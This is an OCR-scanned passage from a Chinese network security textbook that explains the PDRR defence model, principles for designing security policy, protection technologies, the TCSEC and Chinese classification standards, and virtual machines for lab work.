际 上 系统 已 经 处 于 威胁 之 中 了 ,所 以 要 及 时 地 更 新 补丁 。 

安全 是 相对 的 ,没有 绝对 的 安全 .需要 根据 客户 的 实际 情况 ,在 实用 和 安全 之 间 找 一 个 
平衡 点 。 

从 总 体 上 来 看 ,网 络 安全 涉及 网 络 系统 的 多 个 层次 和 多 个 方面 ,同时 ,也 是 一 个 动态 变 
化 的 过 程 。 网 络 安 全 实际 上 是 一 个 系统 工程 , 既 涉 及 对 外 部 攻击 的 有 效 防范 ,又 包括 制定 完 
善 的 内 部 安全 保障 制度 ; 既 涉 及 防 病 毒 攻击 ,又 涵盖 实时 检测 、 防 黑客 攻击 等 内 容 。 因 此 ,网 
络 安全 解决 方案 不 应 仅仅 提供 对 于 某 种 安全 隐患 的 防范 能 力 ,还 应 涵盖 对 于 各 种 可 能 造成 
网 络 安全 问题 隐患 的 整体 防范 能 力 ;同时 ,还 应 该 是 一 种 动态 的 解决 方案 ,能 够 随 着 网 络 安 
全 需求 的 增加 而 不 断 改进 和 完善 。 


1.3.3 网 络 安全 防护 


1. PDRR 模型 


事实 上 ,安全 是 一 种 意识 ,一 个 过 程 ,而 不 仅仅 是 某 种 技术 。 进 入 21 世纪 后 ,网络 信息 
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安全 的 理念 发 生 了 巨大 的 变化 :从 不 惜 一 切 代价 把 入侵 者 阻挡 在 系统 之 外 的 防御 思想 ,开始 
转变 为 防护 一 检测 一 响应 一 恢复 相 结 合 的 思想 ,出 现 了 PDRR (Protect/ Detect/React/ 
Restore) 等 网 络 安全 模型 ,如 图 1-3 所 示 。PDRR 倡导 一 种 综合 的 安全 解决 方法 ,由 防护 、 
检测 .响应 .恢复 4 个 部 分 构成 一 个 动态 的 信息 安全 周期 。 


图 1-3 PDRR 模型 


安全 策略 的 每 一 部 分 包括 一 组 相应 的 安全 措施 来 实施 一 定 的 安全 功能 。 安 全 策略 的 第 
一 部 分 是 防护 ,根据 系统 已 知 的 所 有 安全 问题 做 出 防护 措施 ,例如 , 打 补丁 .访问 控制 和 数据 
加 密 等 。 安 全 策略 的 第 二 部 分 是 检测 ,攻击 者 如 果 穿 过 了 防护 系统 ,检测 系统 就 会 检测 出 入 
侵 者 的 相关 信息 ,一 旦 检测 出 入 侵 事 件 发 生 , 响 应 系统 就 开始 采用 相应 的 安全 措施 ,如 断 开 
网 络 连接 等 。 安 全 策略 的 最 后 一 部 分 是 系统 恢复 ,在 人 侵 事 件 发 生 后 ,把 系统 恢复 到 原来 的 
状态 。 每 次 发 生 入 侵 事 件 ,防护 系统 都 要 更 新 ,保证 相同 类 型 的 入 侵 事 件 不 能 再 次 发 生 ,所 
以 整个 安全 策略 包括 防护 、 检 测 、 响 应 和 恢复 ,这 4 个 方面 组 成 了 一 个 信息 安全 周期 ,使 信息 
的 安全 得 到 全 方位 的 保障 。 

(1) 防护 

网 络 安全 策略 PDRR 模型 的 最 重要 的 部 分 就 是 防护 。 防 护 是 预先 阻止 攻击 可 以 发 生 
的 条 件 产生 ,让 攻击 者 无 法 顺利 地 人 侵 , 防 护 可 以 减少 大 多 数 的 入侵 事件 。 

@ 缺陷 扫描 。 安 全 缺陷 分 为 两 种 ,允许 远程 攻击 的 缺陷 和 只 允许 本 地 攻击 的 缺陷 。 允 
许 远程 攻击 的 缺陷 就 是 攻击 者 可 以 利用 该 缺陷 .通过 网 络 攻 击 系 统 。 只 允许 本 地 攻击 的 缺 
陷 就 是 攻击 者 不 能 通过 网 络 利用 该 缺陷 攻击 系统 。 对 于 允许 远程 攻击 的 安全 缺陷 ,可 以 用 
网 络 缺 陷 扫 描 工 具 去 发 现 。 网 络 缺 陷 扫 描 工 具 一 般 从 系统 的 外 边 去 观察 。 其 次 , 它 扮 演 一 
个 黑客 的 角色 ,只 不 过 它 不 会 破坏 系统 。 网 络 缺 陷 扫 描 工 具 首先 扫描 系统 所 开放 的 网 络 服 
务 端 口 ,然后 通过 该 端口 进行 连接 ,试探 提供 服务 的 软件 类 型 和 版 本 号 。 在 这 个 时 候 , 网 络 
缺陷 扫描 工具 有 两 种 方法 可 以 判断 该 端口 是 和 否 有 缺陷 :第 一 ,根据 版 本 号 ,在 缺陷 列表 中 查 
出 是 否 存在 缺陷 。 第 二 .根据 已 知 的 缺陷 特征 ,模拟 一 次 攻击 ,如 果 攻 击 表 示 可 能 会 成 功 就 
停止 ,并 认为 该 缺陷 存在 (要 停止 攻击 模拟 避免 对 系统 损害 )。 显 然 第 二 种 方法 的 准确 性 比 
第 一 种 要 好 ,但 是 它 扫描 的 速度 会 很 慢 。 

@ 访问 控制 及 防火 墙 。 访 问 控制 限制 某 些 用 户 对 某 些 资源 的 操作 。 访 问 控制 通过 减 
少 用 户 对 资源 的 访问 ,从 而 减少 资源 被 攻击 的 概率 ,达到 防护 系统 的 日 的 。 例 如 ,只 让 可 信 
的 用 户 访问 资源 ,而 不 让 其 他 用 户 访问 资源 .这 样 资源 受到 攻击 的 概率 几乎 很 小 。 防 火 墙 是 
基于 网 络 的 访问 控制 技术 ,在 互联 网 中 已 经 有 着 广泛 的 应 用 。 防 火 墙 技术 可 以 工作 在 网 络 
层 、 传 输 层 和 应 用 层 ,完成 不 同 程度 的 访问 控制 。 防 火 墙 可 以 阻止 大 多 数 的 攻击 但 不 是 全 
部 ,很 多 人 侵 事件 通过 防火 墙 所 允许 的 端口 (例如 80 端口 ) 进 行 攻击 。 

@ 防 病毒 软件 与 个 人 防火 墙 。 病 毒 就 是 计算 机 的 一 段 可 执行 代码 。 一 旦 计算 机 被 感 
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染 上 病毒 ,这 些 可 执行 代码 可 以 自动 执行 ,破坏 计算 机 系统 。 安 装 并 经 常 更 新 防 病毒 软件 会 
对 系统 安全 起 防护 作用 。 防 病毒 软件 根据 病毒 的 特征 ,检查 用 户 系统 上 是 否 有 病毒 。 这 个 
检查 过 程 可 以 是 定期 检查 ,也 可 以 是 实时 检查 。 

个 人 防火 墙 是 防火 墙 和 防 病毒 的 结合 。 它 运行 在 用 户 的 系统 中 ,并 控制 其 他 机 器 对 这 
台 机 器 的 访问 。 个 人 防火 墙 除了 具有 访问 控制 功能 外 ,还 有 病毒 检测 ,甚至 有 入 侵 检 测 的 功 
能 ,是 网 络 安全 防护 的 一 个 重要 发 展 方向 。 

@ 数据 加 密 。 加 密 技 术 保 护 数据 在 存储 和 传输 中 的 保密 性 安全 。 

@@ 鉴别 技术 。 鉴 别 技术 和 数据 加 密 技 术 有 很 紧密 的 关系 。 鉴 别 技术 用 在 安全 通信 中 ， 
对 通信 双方 互相 鉴别 对 方 的 身份 以 及 传输 的 数据 。 鉴 别 技术 保护 数据 通信 的 两 个 方面 : 通 
信和 双方 的 身份 认证 和 传输 数据 的 完整 性 。 

(2) 检测 

PDRR 模型 的 第 二 个 环节 就 是 检测 。 防 护 系统 可 以 阻止 大 多 数 入 侵 事 件 的 发 生 ,但 是 
它 不 能 阻止 所 有 的 入 侵 。 特 别 是 那些 利用 新 的 系统 缺陷 、 新 的 攻击 手段 的 入 侵 。 因 此 安全 
策略 的 第 二 个 安全 屏障 就 是 检测 , 即 如 果 入 侵 发 生 就 检测 出 来 ,这 个 工具 是 入 侵 检测 系统 
(IDS) 。 

IDS 的 功能 是 检测 出 正在 发 生 或 已 经 发 生 的 入 侵 事 件 。 这 些 和 人 侵 已 经 成 功 地 穿 过 防护 
战线 。 根 据 检测 环境 不 同 ,IDS 可 以 分 为 基于 主机 的 IDSCHostbased) 和 基于 网 络 的 IDS 
(Network-based) 。 基 于 主机 的 IDS 检测 基于 主机 上 的 系统 日 志 、 审 计数 据 等 信息 ;而 基于 
网 络 的 IDS 检测 则 一 般 侧 重 于 网 络 流量 分 析 。 

根据 检测 所 使 用 的 方法 的 不 同 ,IDS 可 以 分 为 两 种 : 误 用 检测 (Misuse Detection) 和 蜡 
常 检测 (Anomaly Detection) 。 误 用 检测 技术 需要 建立 一 个 人 侵 规 则 库 , 其 中 , 它 对 每 一 种 
入 侵 都 形成 一 个 规则 描述 ,只 要 发 生 的 事件 符合 于 某 个 规则 就 被 认为 是 入 侵 。 

入 侵 检测 系统 一 般 和 应 急 响 应 及 系统 恢复 有 密切 关系 。 一 旦 人 侵 检测 系统 检测 到 入 侵 
事件 , 它 就 会 将 人 侵 事 件 的 信息 传 给 应 急 响应 系统 进行 处 理 。 

(3) 响应 

PDRR 模型 中 的 第 三 个 环节 就 是 响应 。 响 应 就 是 已 知 一 个 攻击 (入 侵 ) 事 件 发 生 之 后 ， 
进行 相应 的 处 理 。 在 一 个 大 规模 的 网 络 中 ,响应 这 个 工作 都 由 一 个 特殊 部 门 来 负责 , 那 就 是 
计算 机 响应 小 组 。 世界 上 第 一 个 计算 机 响应 小 组 CERT 于 1989 年 建立 ,位 于 美国 CMU 大 
学 的 软件 研究 所 (SED ,是 世界 上 最 著名 的 计算 机 响应 小 组 之 一 。 从 CERT 建立 之 后 ,世界 
各 国 以 及 各 机 构 也 纷纷 建立 自己 的 计算 机 响应 小 组 。 我国 第 一 个 计算 机 紧急 响应 小 组 
CCERT 于 1999 年 建立 ,主要 服务 于 中 国教 育 和 科研 网 。 

入 侵 事 件 的 报警 可 以 是 入侵 检测 系统 的 报警 .也 可 以 是 通过 其 他 方式 的 汇报 。 响 应 的 
主要 工作 也 可 以 分 为 两 种 :一 种 是 紧急 响应 ; 另 一 种 是 其 他 事件 处 理 。 紧 急 响应 就 是 当 安 全 
事件 发 生 时 及 时 采取 应 对 措施 ;其 他 事件 处 理 主要 包括 咨询 .培训 和 技术 支持 。 

(4) 恢复 

恢复 是 PDRR 模型 中 的 最 后 一 个 环节 。 人 恢复 是 事件 发 生 后 ,把 系统 恢复 到 原来 的 状 
态 ,或 者 恢复 到 比 原 来 更 安全 的 状态 。 人 恢复 也 可 以 分 为 两 个 方面 :系统 恢复 和 信息 恢复 。 

@ 系统 恢复 。 是 指 修补 该 事件 所 利用 的 系统 缺陷 :不 让 黑客 再 次 利用 这 样 的 缺陷 人 
侵 。 一 般 系 统 恢 复 包 括 系统 升级 .软件 升级 和 打 补丁 等 。 系 统 恢复 的 另 一 个 重要 工作 是 除 
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去 后 门 。 一 般 来 说 .黑客 在 第 一 次 人 侵 的 时 候 都 是 利用 系统 的 缺陷 。 在 第 一 次 人 侵 成 功 之 
后 ,黑客 就 在 系统 打开 一 些 后 门 ,如 安装 一 个 特洛伊 木马 。 所 以 ,尽管 系统 缺陷 已 经 打 补丁 ， 
黑客 下 一 次 还 可 以 通过 后 门 进入 系统 。 系 统 恢复 都 是 根据 检测 和 响应 环节 提供 有 关 事件 的 
资料 进行 的 。 

@ 信息 恢复 。 是 指 恢 复 丢失 的 数据 。 数 据 丢 失 的 原因 可 能 是 由 于 黑客 人 侵 造成 的 ,也 
可 能 是 由 于 系统 故障 .自然 灾害 等 原因 造成 的 。 信 息 恢 复 就 是 把 备份 和 归档 的 数据 恢复 到 
原来 的 数据 。 信 息 恢复 过 程 跟 数据 备份 过 程 有 很 大 的 关系 。 数 据 备份 做 得 是 否 充分 对 信息 
恢复 有 很 大 的 影响 。 信 息 恢复 过 程 的 一 个 特点 是 有 优先 级 别 。 直 接 影 响 日 常生 活 和 工作 的 
信息 必须 先 恢复 ,这样 可 以 提高 信息 恢复 的 效率 。 


2. 安全 策略 设计 原则 


网 络 安全 策略 规定 了 一 系列 的 安全 防范 措施 ,从 宏观 和 微观 两 方面 保障 网 络 的 安全 。 
在 全 面 了 解 组 织 的 网 络 安全 现状 以 后 ,网 络 安全 策略 设计 者 应 遵循 一 定 的 原则 和 方法 ,在 理 
论 知识 的 指导 下 制定 出 科学 可 靠 的 网 络 安全 策略 。 虽 然 网 络 的 具体 应 用 环境 不 同 ,但 在 制 
定安 全 策略 时 应 遵循 一 些 总 的 原则 。 

(1) 适应 性 原则 。 安 全 策略 是 在 一 定 条 件 下 采取 的 安全 措施 ,必须 是 和 网 络 的 实际 应 
用 环境 相 结合 的 。 通 常 ,在 一 种 情况 下 实施 的 安全 策略 到 另 一 环境 下 就 未 必 适 合 , 因 此 安全 
策略 的 制定 应 充分 考虑 当前 环境 的 实际 需求 。 

(2) 木 桶 原则 。 木 桶 原则 即 * 木 桶 的 最 大 容积 取决 于 最 短 的 那 块 木板 ”, 是 指 对 信息 进 
行 均 衡 全面 地 保护 。 充 分 、 全 面 、 完 整地 对 系统 的 安全 漏洞 和 安全 威胁 进行 分 析 , 评 估 和 检 
测 〈 包 括 模拟 攻击 ) 是 设计 信息 安全 系统 的 必要 前 提 条 件 。 安 全 机 制 和 安全 服务 设计 的 首 
要 目的 是 防止 最 常用 的 攻击 手段 ,根本 目的 是 提高 整个 系统 * 最 低 点 ”的 安全 性 能 。 

(3) 动态 性 原则 。 安 全 策略 是 在 一 定时 期 采取 的 安全 措施 。 由 于 网 络 动态 性 的 特点 ， 
用 户 不 断 增加 ,网 络 规模 不 断 扩大 ,网 络 技术 本 身 的 发 展 变化 也 很 快 ,各 种 漏洞 和 隐患 不 断 
发 现 , 而 安全 措施 是 防范 性 的 、 持 续 不 断 的 ,所 以 制定 的 安全 措施 必须 能 随 着 网 络 性 能 以 及 
安全 需求 的 变化 而 变化 ,应 容易 修改 和 升级 。 

(4) 系统 性 原则 。 网 络 安全 管理 是 一 个 系统 化 的 工作 ,必须 考虑 到 整个 网 络 的 方 方 面 
面 。 也 就 是 在 制定 安全 策略 时 ,应 全 面 考虑 网 络 上 各 类 用 户 、 各 种 设备 .软件 .数据 以 及 各 种 
情况 ,有 计划 、 有 准备 地 采取 相应 的 策略 。 任 何 一 点 政 漏 都 会 造成 整个 网 络 安全 性 的 降低 。 

(5) 需求 .代价 ,风险 平衡 分 析 原 则 。 对 任何 一 个 网 络 而 言 ,绝对 的 安全 是 不 可 能 达到 
的 ,也 是 不 必要 的 。 应 从 网 络 的 实际 需求 出 发 ,对 网 络 面临 的 威胁 及 可 能 承担 的 风险 进行 定 
性 与 定量 相 结合 的 分 析 ,在 需求 ,代价 和 风险 间 寻 求 一 个 平衡 点 ,在 此 基础 上 制定 规范 和 措 
施 ,确定 系统 的 安全 策略 。 

(6) 一 致 性 原则 。 一 致 性 原则 主要 是 指 网 络 安全 问题 应 与 整个 网 络 的 工作 周期 (或 生 
命 周 期 ) 同 时 存在 .制定 的 安全 体系 结构 必须 与 网 络 安全 需求 相 一 致 ,在 网 络 系统 设计 及 实 
施 计划 、 网 络 验 证 验收、 运行 等 网 络 生命 周期 的 各 个 阶段 .都 要 制定 相应 的 安全 策略 。 

(7) 最 小 授权 原则 。 从 网 络 安全 的 角度 考虑 问题 ,打开 的 服务 越 多 ,可 能 出 现 的 安全 漏 
洞 就 会 越 多 。 最 小 授权 原则 指 的 是 网 络 中 账号 设置 .服务 配置 .主机 间 信 任 关 系 配置 等 应 该 
为 网 络 正 常 运 行 所 需 的 最 小 限度 。 关 闭 网 络 安全 策略 中 没有 定义 的 网 络 服务 并 将 用 户 的 权 
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限 配置 为 策略 定义 的 最 小 限度 、 及 时 删除 不 必要 的 账号 等 措施 可 以 将 系统 的 危险 性 大 大 降 
低 。 在 没有 明确 的 安全 策略 的 网 络 环境 中 ,网 络 安全 管理 员 通 过 简单 关闭 不 必要 或 者 不 了 
解 的 网 络 服务 ,删除 主机 信任 关系 、 及 时 删除 不 必要 的 账号 等 手段 也 可 以 将 入 侵 危 险 降低 一 
半 以 上 。 

(8) 整体 性 原则 。 要 求 在 发 生 被 攻击 、 破 坏事 件 的 情况 下 ,必须 尽 可 能 地 快速 恢复 信息 
系统 的 服务 ,减少 损失 。 因 此 ,信息 安全 系统 应 该 包括 安全 防护 机 制 、 安 全 检测 机 制 和 安全 
恢复 机 制 。 

(9) 技术 与 管理 相 结 合 原则 。 安 全 体系 是 一 个 复杂 的 系统 工程 ,涉及 人 技术、 操作 等 
各 方面 要 素 , 单 靠 技术 或 管理 都 不 可 能 实现 。 因 此 ,必须 将 各 种 安全 技术 与 运行 管理 机 制 、 
人 员 思 想 教育 与 技术 培训 、 安 全 规章 制度 建设 相 结合 。 

(10) 易 操作 性 原则 。 首 先 ,安全 措施 需要 人 为 地 去 完成 ,如 果 措 施 过 于 复杂 ,对 人 的 要 
求 过 高 ,本 身 就 降低 了 安全 性 ;其 次 ,措施 的 采用 不 能 影响 系统 的 正常 运行 。 


3. 网 络 安全 保障 技术 


网 络 安全 强调 的 是 通过 采用 各 种 安全 技术 和 管理 上 的 安全 措施 ,确保 网 络 数据 在 公用 
网 络 系 统 中 传输 ,交换 和 存储 流通 的 可 用 性 、 完 整 性 、 可 用 性 、 可 控 性 和 不 可 否认 性 。 网 络 安 
全 技术 是 在 网 络 攻击 的 对 抗 中 不 断 发 展 的 , 它 大 致 经 历 了 从 静态 到 动态 .从 被 动 防范 到 主动 
防范 的 发 展 过 程 。 当 前 采用 的 网 络 信息 安全 保护 技术 主要 有 两 类 :主动 防御 保护 技术 和 被 
动 防御 保护 技术 。 

(1) 主动 防御 保护 技术 

主动 防御 保护 技术 一 般 通 过 数据 加 密 、 身 份 鉴 别 、 访 问 控 制 、 权 限 设置 和 虚拟 专用 网 络 
等 技术 来 实现 。 

@ 数据 加 密 。 密 码 技术 被 公认 为 是 保护 网 络 信 息 安 全 的 最 实用 的 方法 ,人 们 普遍 认 
为 ,对 数据 最 有 效 的 保护 就 是 加 密 。 

@ 身份 鉴别 。 身 份 鉴别 强调 一 致 性 验证 ,通常 包括 验证 依据 、 验 证 系统 和 安全 要 求 。 

@ 访问 控制 。 访 问 控制 是 指 主体 对 何 种 客体 具有 何 种 操作 权利 。 访 问 控制 是 网 络 安 
全 防范 和 保护 的 主要 策略 ,根据 控制 手段 和 具体 日 的 的 不 同 .可 以 将 访问 控制 技术 分 为 人 网 
访问 控制 .网 络 权限 控制 .日 录 级 安全 控制 和 属性 安全 控制 等 。 访 问 控制 的 内 容 包 括 人 员 限 
制 ,访问 权限 设置 .数据 标识 .控制 类 型 和 风险 分 析 。 

@ 虚拟 专用 网 络 。 虚 拟 专用 网 络 (VPN) 是 在 公 网 基础 上 进行 逻辑 分 割 而 虚拟 构建 的 
一 种 特殊 通信 环境 ,使 用 虚拟 专用 网 络 或 虚拟 局 域 网 技术 ,能 确保 其 具有 私有 性 和 隐蔽 性 。 

(2) 被 动 防御 保护 技术 

被 动 防御 保护 技术 主要 有 防火 墙 技 术 、 入 侵 检测 系统 、 安 全 扫描 器 ,口令 验证 .审计 跟 
踪 、 物 理 保 护 及 安全 管理 等 。 

@ 防火 墙 技术 。 防 火 墙 是 内 部 网 与 外 部 网 之 间 实 施 安全 防范 的 系统 ,可 被 认为 是 一 种 
访问 控制 机 制 , 用 于 确定 哪些 内 部 服务 允许 外 部 访问 以 及 哪些 外 部 服务 允许 内 部 访问 。 

@ 入 侵 检测 系统 。 入 侵 检 测 系 统 (IDS) 是 在 系统 中 的 检查 位 置 执行 人 侵 检测 功能 的 程 
序 或 硬件 执行 体 ,可 对 当前 的 系统 资源 和 状态 进行 监控 .检测 可 能 的 入 侵 行为 。 

@ 安全 扫描 器 。 安 全 扫描 器 是 可 自动 检测 远程 或 本 地 主机 及 网 络 系统 的 安全 性 漏洞 
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的 专用 功能 程序 ,可 用 于 观察 网 络 信息 系统 的 运行 情况 。 

@ 口令 验证 。 口令 验证 可 有 效 防止 攻击 者 假冒 身份 登录 系统 。 

@@ 审计 跟踪 。 与 安全 相关 的 事件 记录 在 系统 日 志文 件 中 ,事后 可 以 对 网 络 信息 系统 的 
运行 状态 进行 详尽 审计 ,帮助 发 现 系统 存在 的 安全 弱点 和 人 侵 点 ,尽量 降低 安全 风险 。 

@ 物理 保护 及 安全 管理 。 如 实行 安全 隔离 :通过 制定 标准 ,管理 办 法 和 条 例 ,对 物理 实 
体 和 信息 系统 加 强 规范 管理 ,减少 人 为 因素 的 干扰 。 


1.3.4 网 络 安全 标准 


1. 美国 的 TCSEC 


可 信 计 算 机 系统 评价 准则 (Trusted Computer System Evaluation Criteria,TCSEC) ,又 
称 为 橘 皮 书 , 它 将 计算 机 系统 的 安全 等 级 划分 为 ABC`D 共 4 类 7 个 级 别 , 如 表 1-5 所 示 。 
其 中 ,A 类 安全 等 级 最 高 ,D 类 安全 等 级 最 低 。 它 是 计算 机 系统 安全 评估 的 第 一 个 正式 标 
准 , 具 有 划时代 的 意义 。 该 准则 于 1970 年 由 美国 国防 科学 委员 会 提出 ,并 于 1985 年 12 月 
由 美国 国防 部 公布 。TCSEC 最 初 只 是 军用 标准 ,后 来 扩展 至 民用 领域 。 


表 1-5 安全 等 级 
类 别 级 别 名 称 主要 特征 

A A 验证 设计 形式 化 的 最 高 级 描述 和 验证 
B3 安全 区 域 存 取 监督 ,安全 内 核 ,高 抗 渗透 能 力 

B B2 结构 保护 面向 安全 的 体系 结构 , 较 好 的 抗 渗透 能 力 
Bl 标识 安全 保护 强制 存 取 控制 ,安全 标识 

二 C2 访问 控制 保护 存 取 控制 以 用 户 为 单位 ,广泛 的 审计 、 跟 踪 
cl 选择 性 安全 保护 有 选择 的 存 取 控制 ,用 户 与 数据 分 离 

D D 低级 保护 没有 安全 保护 


OD 级 。 DD 级 是 最 低 的 安全 形式 ,整个 系统 是 不 可 信任 的 。 拥 有 这 个 级 别 的 操作 系统 
就 像 一 个 敞开 大 门 的 房子 ,任何 人 可 以 自由 进出 ,是 完全 不 可 信任 的 。 对 于 硬件 来 说 ,没有 
任何 保护 措施 ;对 于 操作 系统 来 说 很 容易 受到 损害 。 没 有 系统 访问 限制 和 数据 访问 限制 , 任 
何人 不 需要 账户 就 可 以 进入 系统 ,不 受 任何 限制 就 可 以 访问 他 人 的 数据 文件 。 具 有 该 安全 
级 别 的 典型 操作 系统 有 MS-DOS、Windows 98、Macintosh 7. x 等 。 

@C 级 。C 级 安全 级 别 能 够 提供 审慎 的 保护 功能 .并 具有 对 用 户 的 行为 和 责任 进行 审 
计 的 能 力 。 该 安全 级 别 又 由 C1 和 C2 两 个 子安 全 级 别 共 同 组 成 。 

C1 级 又 称 选择 性 安全 保护 级 别 , 它 要 求 系统 硬件 有 一 定 的 安全 保护 (如 硬件 有 带 锁 装 
置 ,需要 钥匙 才能 使 用 计算 机 ) ,用 户 在 使 用 前 必须 登录 到 系统 。 另 外 .作为 Cl 级 保护 的 一 
部 分 ,允许 系统 管理 员 为 一 些 程序 或 数据 设立 访问 许可 权限 等 。 

C2 级 又 称 访问 控制 保护 级 别 , 除 Cl 级 所 包含 的 特性 外 .还 具有 访问 控制 环境 
(Controlled Access Environment) 的 安全 特征 。 访问 控制 环境 具有 进一步 限制 用 户 执 行 某 
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些 命令 或 访问 某 些 文件 的 能 力 : 这 不 仅 是 基于 许可 权限 ,而且 还 是 基于 身份 验证 级 别 。 这 种 
级 别 要 求 对 系统 加 以 审计 (Audit) ,并 写 入 日志 中 ,例如 .用户 何 时 开机 、 哪 个 用 户 在 何 时 何 
地 登录 系统 等 。 通 过 查看 日 志 信息 ,就 可 以 发 现 人 侵 的 痕迹 ,如 发 现 多 次 登录 失败 的 日 志 信 
息 ,那么 可 大 致 得 出 有 人 想 人 侵 系 统 。 另 外 ,审计 用 来 跟踪 记录 所 有 与 安全 有 关 的 事件 , 比 
如 系统 管理 员 所 执行 的 操作 活动 ,审计 对 身份 的 验证 。 审 计 的 缺点 就 是 需要 额外 的 处 理 器 
时 间 和 磁盘 空间 。Netware、UNIX、Windows NT、Windows 2000 和 Windows Server 2003 
属于 这 个 级 别 。 

@B 级 。B 级 具有 强制 性 保护 功能 ,强制 性 保护 意味 着 如 果 用 户 没有 与 安全 等 级 相 
连 , 系 统 就 不 会 允许 用 户 存 取 对 象 。B 级 又 可 细 分 为 Bl1、B2 和 B3 三 个 子安 全 级 别 。 

Bl 级 又 称 标识 安全 保护 (Labeled Security Protection) 级 别 , 是 支持 多 级 安全 (比如 秘 
密 和 绝密 ) 的 第 一 个 级 别 。 对 象 (如 盘 区 、 文 件 服务 器 日 录 等 ) 必 须 在 强制 性 访问 控制 之 下 ， 
系统 不 允许 文件 的 拥有 者 更 改 它们 的 许可 权限 。 

B2 级 又 称 结构 保护 (Structured Protection) 级 别 , 要 求 计算 机 系统 中 所 有 的 对 象 都 要 
加 注 标签 ,而 且 还 给 设备 (如 磁盘 .磁带 等 ) 分 配 单 个 或 多 个 安全 级 别 。 

B3 级 又 称 安全 区 域 C(Security Domain) 级 别 ,使 用 安装 硬件 的 方式 来 加 强 域 的 安全 。 例 
如 ,安装 内 存 管 理 硬件 用 于 保护 安全 域 免 遭 无 授权 访问 或 更 改 其 他 安全 域 的 对 象 。 该 级 别 
也 要 求 用 户 的 终端 通过 一 条 可 信任 的 途径 连接 到 系统 上 。 

@A 级 。A 级 又 称 为 验证 设计 (Verity Design) 级 别 ,. 是 当前 橘 皮 书 的 最 高 级 别 ,包括 
一 个 严格 的 设计 ,控制 和 验证 过 程 。 与 前 面 提 到 的 各 级 别 一 样 ,这 一 级 别 包 含 了 较 低级 别 的 
所 有 的 安全 特性 。 安 全 设计 必须 是 从 数学 角度 上 经 过 验证 的 ,而 且 必 须 进行 秘密 通道 和 可 
信任 分 布 的 分 析 。 可 信任 分 布 (Trusted Distribution) 的 含义 是 :硬件 和 软件 在 物理 传输 过 
程 中 受到 保护 ,以 防止 破坏 安全 系统 。 


2. 我 国 的 安全 标准 


我 国 的 安全 标准 主要 是 于 2001 年 1 月 1 日 起 实施 的 由 公安 部 主持 制定 、 国 家 技术 标准 
局 发 布 的 中 华人 民 共 和 国标 准 GB 17895 一 1999《 计 算 机 信息 系统 安全 保护 等 级 划分 准则 》。 
该 准则 将 信息 系统 安全 划分 为 5 个 等 级 ,分 别 是 自主 保护 级 、 系 统 审计 保护 级 、 安 全 标记 保 
护 级 、 结 构 化 保护 级 和 访问 验证 保护 级 。 

@ 自主 保护 级 。 本 级 的 安全 保护 机 制 使 用 户 具 备 自主 安全 保护 能 力 ,保护 用 户 和 用 户 
组 信息 ,避免 其 他 用 户 对 数据 的 非法 读 / 写 和 破坏 。 

@ 系统 审计 保护 级 。 本 级 的 安全 保护 机 制 具备 第 一 级 的 所 有 安全 保护 功能 ,并 创建 、 
维护 访问 审计 跟踪 记录 .以 记录 与 系统 安全 相关 事件 发 生 的 日 期 .时 间 、 用 户 和 事件 类 型 等 
信息 ,使 所 有 用 户 对 自己 行为 的 合法 性 负责 。 

@ 安全 标记 保护 级 。 本 级 的 安全 保护 机 制 具备 系统 审计 保护 级 的 所 有 安全 功能 ,并 为 
访问 者 和 访问 对 象 指定 安全 标记 .以 访问 对 象 标 记 的 安全 级 别 限 制 访问 者 的 访问 权限 ,实现 
对 访问 对 象 的 强制 保护 。 

@ 结构 化 保护 级 。 本 级 的 安全 保护 机 制 具备 安全 标记 保护 级 的 所 有 安全 功能 ,并 将 安 
全 保护 机 制 划 分 成 关键 部 分 和 非 关 键 部 分 相 结合 的 结构 .其 中 关键 部 分 直接 控制 访问 者 对 
访问 对 象 的 存 取 。 本 级 具有 相当 强 的 抗 渗透 能 力 。 
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加 访问 验证 保护 级 。 本 级 的 安全 保护 机 制 具备 结构 化 保护 级 的 所 有 安全 功能 .并 特别 
增设 访问 验证 功能 .负责 仲裁 访问 者 对 访问 对 象 的 所 有 访问 活动 。 本 级 具有 极 强 的 抗 渗透 
能 力 。 


1.3.5 虚拟 机 技术 


虚拟 机 (Virtual Machine) 是 指 通过 软件 模拟 的 具有 完整 硬件 系统 功能 的 ,运行 在 一 个 
完全 隔离 环境 中 的 完整 计算 机 系统 。 

通过 虚拟 机 软件 ,可 以 在 一 台 物 理 计算 机 上 模拟 出 一 台 或 多 台 虚 拟 的 计算 机 ,这 些 虚拟 机 
就 像 真 正 的 计算 机 那样 进行 工作 ,例如 可 以 安装 操作 系统 .安装 应 用 程序 .访问 网 络 资源 等 。 
对 于 用 户 而 言 , 它 只 是 运行 在 用 户 物 理 计 算 机 上 的 一 个 应 用 程序 ;但 是 对 于 在 虚拟 机 中 运行 的 
应 用 程序 而 言 , 它 就 是 一 台 真 正 的 计算 机 。 因 此 , 当 在 虚拟 机 中 进行 软件 评测 时 ,可 能 系统 一 
样 会 崩溃 ,但 是 ,崩溃 的 只 是 虚拟 机 上 的 操作 系统 ,而 不 是 物理 计算 机 上 的 操作 系统 ,并 且 使 用 
虚拟 机 的 Undo( 恢 复 ? 功 能 ,可 以 马上 恢复 虚拟 机 到 安装 软件 之 前 的 状态 。 

目前 流行 的 虚拟 机 软件 有 VMware(VMware ACE) 、Virtual Box 和 Virtual PC ,它们 
都 能 在 Windows 系统 上 虚拟 出 多 台 计 算 机 。 在 本 书 的 网 络 安全 实验 中 ,为 了 方便 实验 的 进 
行 , 较 多 地 使 用 了 各 种 虚拟 机 来 搭建 网 络 安全 虚拟 实验 环境 ,如 Windows Sever 2000 虚拟 
机 、Windows Sever 2003 虚拟 机 等 。 
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1.4.1 任务 1: 系 统 安全 “ 傻 事 清单 ” 


以 下 是 一 些 普通 的 计算 机 用 户 经 常会 犯 的 安全 性 错误 ,请 对 照 并 根据 自己 的 实际 情况 
做 出 选择 (在 供 选择 的 答案 前 面 打 “V”, 注 意 : 单 选 )。 

@ 使 用 没有 过 电压 保护 的 电源 。 这 个 错误 真 的 能 够 毁 掉 计 算 机 设备 以 及 上 面 所 保存 
的 数据 。 你 可 能 以 为 只 有 在 雷电 发 生 时 .系统 才 会 有 危险 .但 其 实 任何 能 够 干扰 电路 并 使 电 
流 回 流 的 因素 都 能 烧 焦 你 的 设备 元 件 。 有 时 甚至 一 个 简单 的 动作 ,比如 打开 与 计算 机 设备 
在 同一 个 电路 中 的 设备 (如 电 吹 风 、 电 加 热 器 或 者 空调 等 高 压 电器 ) 就 能 导致 电 涌 。 如 果 
遇 到 停电 , 当 恢 复 电力 供应 时 也 会 出 现 电 涌 。 

